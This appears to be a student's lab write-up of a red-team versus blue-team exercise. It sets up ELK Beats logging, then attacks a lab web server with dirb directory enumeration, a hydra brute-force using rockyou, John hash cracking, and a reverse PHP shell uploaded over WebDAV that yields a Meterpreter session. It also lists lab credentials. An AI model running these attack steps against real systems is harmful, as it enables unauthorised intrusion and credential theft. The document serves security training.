Project Write Up
RedTeam vs. BlueTeam
Devices
- Kali
- Capstone
- Elk
Set Up Beats
Need to set up beats in order to log the attacks.
Steps to set up:
- Log into Capstone
vagrant:tnargav
sudo sufilebeat modules enable apachefilebeat setupmetricbeat modules enable apachemetricbeat setuppacketbeat setupsystemctl restart filebeatsystemdtl restart metricbeatsystemctl restart packetbeat
Attacking Capstone
- Determine capstone ip
- Open http://192.168.1.105
- Try to find "secret" page
dirb http://192.168.1.105- Returned
- http://192.168.1.105/server-status
- Access Forbidden
- http://192.168.1.105/webdav
- Username:Password Protected
- http://192.168.1.105/server-status
- Returned
dirb http://192.168.1.105/company_folders- Returned 0
- Scrolled through pages
- Try to find "secret" page
- Run Hydra against http://192.168.1.105/company_folders_secret_folder
- Find Wordlist
locate rockyou
cd /usr/share/wordlistslsgunzip rockyou.txt.gzls- to verify successful unzip
hydra help- To see all avaliable flags
- Ashton manages secret folder
- Means username is ashton
hydra -l ashton -P rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder
- Find Wordlist
- Open connect to corp server
- webdav
- log in with ryans account
- ryan password hash
d7dad0a5cd7c8376eeb50d69b3ccd352 echo d7dad0a5cd7c8376eeb50d69b3ccd352 > hash.txtjohn hash.txtjohn -show hash.txtryan:linux4u
- Upload reverse php to webdav
- Create Listener
- Open exploit.php in web to run on remote server
- Meterpreter session






